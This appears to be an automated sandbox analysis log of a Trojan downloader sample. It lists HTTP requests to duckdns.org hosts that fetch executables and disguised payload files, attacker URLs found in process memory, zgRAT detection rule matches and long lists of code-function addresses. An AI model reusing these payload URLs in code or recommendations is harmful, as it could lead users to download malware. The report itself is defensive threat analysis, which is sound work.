Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/mirtn.exe HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/utr32.exe HTTP/1.1Host: bnfjdbhgo.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/plugin3.dll HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Uuanez.pdf HTTP/1.1Host: bnfjdbhgo.duckdns.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: juytlioojbni.duckdns.org
Source: pjmskbbdr.exe, 0000001B.00000002.2248679548.0000000003191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bnfjdbhgo.duckdns.org
Source: pjmskbbdr.exe, 0000001B.00000002.2248679548.0000000003191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bnfjdbhgo.duckdns.org/byfronbypass.html/css/mss/Uuanez.pdfPDY
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002971000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002921000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A00001000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806371000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5A72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://juytlioojbni.duckdns.org
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002971000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000000.1391740961.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Gkwyrkfwp.pdf1Y
Source: fdyryi.exe, 0000000F.00000002.1746723723.0000029A00001000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806371000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1918380298.00000154E3EB5000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5A61000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://juytlioojbni.duckdns.org/byfronbypass.html/css/mss/Wsrszrqqkm.vdf
Source: powershell.exe, 00000012.00000002.1924877275.0000027640139000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1495552847.0000000005EA8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microso
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1491803301.000000000568D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft.c
Source: powershell.exe, 00000003.00000002.1582199851.00000215E7A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1631558820.00000296B3609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1924877275.0000027640139000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1470593707.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1582199851.00000215E77E1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002971000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.00000000031DB000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1588820194.0000000003528000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1631558820.00000296B33E1000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 0000000F.00000002.1746723723.0000029A00001000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.1830875992.000001A94689F000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1924877275.000002763FF11000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806371000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2314717443.00000000032B7000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2314717443.00000000036E2000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5A72000.00000004.00000800.00020000.00000000.sdmp, pjmskbbdr.exe, 0000001B.00000002.2248679548.0000000003191000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1582199851.00000215E7A09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1631558820.00000296B3609000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1924877275.0000027640139000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000012.00000002.1924877275.0000027640139000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000000.1391740961.00000000009D2000.00000002.00000001.01000000.00000003.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000048B3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd
Source: powershell.exe, 00000003.00000002.1582199851.00000215E77E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1631558820.00000296B33E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1924877275.000002763FF11000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000012.00000002.1924877275.0000027640139000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003111000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002BCD000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000007.00000002.1635965900.00000000047ED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956D4F000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956D00000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002DFD000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2866397789.000000000484D000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541C07000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BF7000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1443307685.0000000003123000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000005.00000002.1530270940.0000000002C98000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.1635084673.0000000002B8B000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956CF2000.00000004.00000800.00020000.00000000.sdmp, fdyryi.exe, 00000010.00000002.2305476496.000001A956D44000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Keywords.exe, 00000011.00000002.1872584736.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.1910595763.000001B806521000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000015.00000002.2314717443.0000000003281000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.1955857025.00000205313C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.1968077949.00000154E5C11000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000000.00000002.1461192975.0000000005EE0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.0000000004497000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, 00000002.00000002.1480296613.00000000042EC000.00000004.00000800.00020000.00000000.sdmp, Keywords.exe, 00000011.00000002.2144258743.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000014.00000002.2143085214.000001B81637E000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541B9A000.00000004.00000800.00020000.00000000.sdmp, AlgorithmType.exe, 00000016.00000002.2526240071.0000020541BE8000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000017.00000002.2317223461.00000154F5B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 173.222.162.55:443 -> 192.168.2.10:49708 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 22.2.AlgorithmType.exe.205312b0000.0.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 22.2.AlgorithmType.exe.205312b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.3f36b50.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 20.2.AlgorithmType.exe.1b81698e628.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000016.00000002.1915461122.00000205312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects zgRAT Author: ditekSHen
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05FE3270 0_2_05FE3270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05FE23F0 0_2_05FE23F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F96E5B 0_2_05F96E5B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F58198 0_2_05F58198
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F5B385 0_2_05F5B385
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F5CC88 0_2_05F5CC88
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_05F58EB8 0_2_05F58EB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_080AD990 0_2_080AD990
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_0809000A 0_2_0809000A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_08090040 0_2_08090040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 0_2_080AD1B8 0_2_080AD1B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E458F0 2_2_02E458F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E41C20 2_2_02E41C20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E41BF2 2_2_02E41BF2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E45372 2_2_02E45372
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E45378 2_2_02E45378
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E458E0 2_2_02E458E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E42720 2_2_02E42720
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E42730 2_2_02E42730
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E41C20 2_2_02E41C20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_02E44DE1 2_2_02E44DE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_054D0040 2_2_054D0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_054D2B67 2_2_054D2B67
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_054D0006 2_2_054D0006
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05864498 2_2_05864498
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058650B0 2_2_058650B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05867363 2_2_05867363
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05861CD8 2_2_05861CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05865F28 2_2_05865F28
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05868A76 2_2_05868A76
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_0586758F 2_2_0586758F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058647E0 2_2_058647E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05861CC9 2_2_05861CC9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05868AC0 2_2_05868AC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058B34A8 2_2_058B34A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058B0040 2_2_058B0040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058B10D8 2_2_058B10D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_058B0367 2_2_058B0367
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05ACF6A0 2_2_05ACF6A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05ACCAB8 2_2_05ACCAB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_05ACB040 2_2_05ACB040
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_06450760 2_2_06450760
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_06450B2A 2_2_06450B2A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe Code function: 2_2_064508A0 2_2_064508A0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D3C788 5_2_05D3C788
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D3C779 5_2_05D3C779
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D33315 5_2_05D33315
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D33270 5_2_05D33270
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D33262 5_2_05D33262
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_05D3CD39 5_2_05D3CD39
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064ED990 5_2_064ED990
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064D0040 5_2_064D0040
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064D0006 5_2_064D0006
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 5_2_064ED1B8 5_2_064ED1B8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_016558F0 7_2_016558F0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01651C20 7_2_01651C20
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01655105 7_2_01655105
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_016558EB 7_2_016558EB
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_0165536B 7_2_0165536B
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01655378 7_2_01655378
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01651BF2 7_2_01651BF2
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01651C20 7_2_01651C20
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01652720 7_2_01652720
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_01652730 7_2_01652730
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05750040 7_2_05750040
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05752B67 7_2_05752B67
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_0575001D 7_2_0575001D
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05750007 7_2_05750007
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_0575494F 7_2_0575494F
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C4498 7_2_057C4498
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C50B0 7_2_057C50B0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C7363 7_2_057C7363
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C1CD8 7_2_057C1CD8
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C5F28 7_2_057C5F28
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C8A76 7_2_057C8A76
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C758F 7_2_057C758F
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C47E0 7_2_057C47E0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C1CC9 7_2_057C1CC9
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_057C8AC0 7_2_057C8AC0
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05A30040 7_2_05A30040
Source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe Code function: 7_2_05A310D8 7_2_05A310D8
